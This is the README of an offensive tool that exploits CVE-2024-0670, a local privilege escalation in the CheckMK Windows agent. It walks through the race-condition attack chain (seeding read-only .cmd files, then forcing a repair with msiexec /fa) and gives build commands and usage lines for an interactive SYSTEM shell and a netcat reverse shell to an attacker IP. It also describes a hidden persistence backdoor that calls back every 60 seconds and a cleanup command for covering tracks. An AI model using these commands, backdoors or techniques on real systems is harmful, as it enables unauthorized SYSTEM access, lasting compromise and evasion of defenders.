Native C++ Weapon | CheckMK Agent Local Privilege Escalation
Creator: C0deGhost | Version: 14.0 (Stable) | MITRE T1068
Click to view Table of Contents Fsociety
Click to expand Fsociety Intel Report...
This framework weaponizes **CVE-2024-0670**, a critical logic flaw in the CheckMK Agent for Windows. The vulnerability exists within the agent's plugin execution mechanism, specifically in how it handles temporary files within C:\Windows\Temp.
The Fsociety-CVE-2024-0670 exploit leverages a "Fail-Open" condition combined with a Race Condition to trick the NT AUTHORITY\SYSTEM service into executing arbitrary code provided by a low-privileged attacker.
cmk_all_{PID}_{Counter}.cmd. It attempts to write these files to the globally writable C:\Windows\Temp directory before executing them.
The Flaw (Fail-Open): If the agent encounters a file collision (e.g., the file already exists and is Read-Only), the write operation fails. However, the agent does not abort. Instead, it proceeds to execute the existing file, assuming it was successfully created by itself.
Attack Chain (Surgical):
- Reconnaissance: Identify the installation path via Registry (Installer UserData).
- Seeding: Pre-create thousands of malicious
.cmdfiles covering the probable PID range of the next agent execution. - Locking: Apply
FILE_ATTRIBUTE_READONLYto the seeded files using Native WinAPI to trigger the write failure. - Trigger: Force a service restart via
msiexec /fa(Repair Mode). - Execution: The agent wakes up, fails to overwrite our trap, and executes our payload as SYSTEM.
We are the bug in the system.
- Tactic: Privilege Escalation
- Technique: Exploitation for Privilege Escalation
graph TD;
A["Attacker (Low Priv)"] --> B{Seeding Phase};
B --> C[Create Malicious .cmd Files];
C --> D[Set ReadOnly Attribute];
D --> E{Trigger Phase};
E --> F[Invoke msiexec /fa];
F --> G[CheckMK Service Restarts];
G --> H{Write Attempt};
H -- "Fails (Access Denied)" --> I["Fail-Open Logic"];
I --> J[Execute Existing File];
J --> K["SYSTEM Shell"];
%% Estilos Fsociety
style A fill:#222,stroke:#ff0000,stroke-width:2px,color:#ff0000
style I fill:#222,stroke:#ffff00,stroke-width:2px,color:#ffff00
style K fill:#222,stroke:#ff0000,stroke-width:4px,color:#ff0000
- β‘ Native C++ Architecture: Written in pure C++ using WinAPI. No external dependencies (Python/PowerShell) required on the target. Fast, stealthy, and lightweight.
- π Interactive Shell Mode: Provides a pseudo-shell environment (
--Shell-mode) that allows executing commands as SYSTEM repeatedly without re-running the exploit. - π Persistence Module: Built-in
Install-persistencecommand. Deploys a hidden, self-healing backdoor inC:\ProgramDataexecuting as SYSTEM. - π§ Smart Registry Detection: Automatically hunts for the CheckMK MSI path in
Installer\UserDatato trigger the repair, bypassing standard obfuscation. - π‘οΈ Surgical Verbose: Detailed operational logging for Red Team debugging and forensic analysis.
Give a man a gun and he'll rob a bank. Give a man knowledge and he'll rob the world.
Click to view Fsociety Operation Manual...
Use MinGW-w64 to build the static binary.
x86_64-w64-mingw32-g++ Fsociety-CVE-2024-0670.cpp -o Fsociety-CVE-2024-0670.exe -static -lws2_32
Transfer Fsociety-CVE-2024-0670.exe and nc.exe to the target machine (e.g., C:\Windows\Temp).
Mode A: Interactive Shell (Recommended)
.\Fsociety-CVE-2024-0670.exe --Shell-mode
Mode B: Direct Reverse Shell (Single Shot)
.\Fsociety-CVE-2024-0670.exe --LHOST 10.10.16.2 --LPORT 4444 --Directory-netcat C:\Windows\Temp\nc.exe
Click to expand Proof of Concept Gallery...
Professional CLI with centered parameters and Fsociety aesthetics.
Entering the Exploit-Shell environment. The framework handles the race condition in the background for every command.
Executing whoami and verifying nt authority\system privileges via the exploit.
Using the internal Install-persistence command to deploy a permanent backdoor.
Evidence #2
Catching the SYSTEM shell on the attacker machine.
Evidence #2
Real-time analysis of the seeding process and trigger execution.
Click to view full Command Line Interface...
| Flag | Description |
|---|---|
--help |
Show the help menu and banner. |
--Shell-mode |
Enter the interactive pseudo-shell loop. Enables internal commands. |
--Command <CMD> |
Execute a single command as SYSTEM and exit (Non-interactive). |
--LHOST <IP> |
Attacker IP Address (Required for Reverse Shell). |
--LPORT <PORT> |
Attacker Port (Required for Reverse Shell). |
--Directory-netcat |
Path to nc.exe on the target. Default: C:\Windows\Temp\nc.exe. |
--Verbose |
Enable surgical logging (File creation, API calls, Registry scan). |
Available only when inside the --Shell-mode prompt.
| Command | Description |
|---|---|
Install-persistence |
Deploys a hidden .bat file in C:\ProgramData that executes a reverse shell every 60 seconds as SYSTEM. |
Eliminate-persistence |
Surgically removes the backdoor file and kills the associated processes to clean tracks. |
<Any Command> |
Executes standard Windows commands (e.g., whoami, ipconfig, type flag.txt). |
This tool is intended for educational purposes, security research, and authorized penetration testing engagements only. The author (C0deGhost) and Fsociety are not responsible for any misuse or damage caused by this program. Use this tool ethically and responsibly.
Control is an illusion.
WE ARE FSOCIETY. WE ARE FINALLY FREE. WE ARE FINALLY AWAKE.